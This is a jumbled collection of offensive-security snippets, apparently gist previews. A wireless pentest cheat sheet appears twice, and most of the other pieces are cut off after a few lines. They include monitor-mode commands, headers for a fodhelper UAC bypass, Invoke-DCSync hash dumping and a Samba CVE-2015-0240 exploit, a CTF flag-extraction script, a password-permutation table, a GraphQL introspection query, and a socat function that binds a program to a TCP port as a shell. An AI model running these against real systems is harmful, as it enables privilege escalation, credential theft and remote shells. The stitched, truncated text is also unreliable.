#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
<# | |
.SYNOPSIS | |
This script can bypass User Access Control (UAC) via fodhelper.exe | |
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts | |
an elevated command prompt. | |
.NOTES | |
Function : FodhelperUACBypass | |
File Name : FodhelperUACBypass.ps1 |
#!/usr/bin/python | |
import xml.etree.ElementTree as ET | |
import subprocess | |
import time | |
import os | |
#http://xael.org/pages/python-nmap-en.html | |
import nmap | |
def parseMasscanReport(path): | |
hostsPorts = {} |
import urllib | |
import urllib2 | |
url = 'http://gap.chal.ctf.westerns.tokyo/login.php' | |
flag = 'TWCTF{' | |
table = 'abcdefghijklmnopqrstuvwlyz' | |
table += table.upper() | |
table += '_{}' |
#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
# Add to .bashrc | |
# You're welcome | |
function soocat { | |
socat tcp-l:${2},reuseaddr,fork EXEC:${1} | |
} |
#!/usr/bin/perl | |
use strict; | |
use warnings; | |
my %permution = ( | |
"a" => "a4@&A", | |
"b" => "bB", | |
"c" => "cC", | |
"d" => "dD", |
query IntrospectionQuery { | |
__schema { | |
queryType { name } | |
mutationType { name } | |
subscriptionType { name } | |
types { | |
...FullType | |
} | |
directives { |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
#!/usr/bin/python | |
""" | |
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
in libtalloc does not write a value on 'creds' address. | |
Reference: | |
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |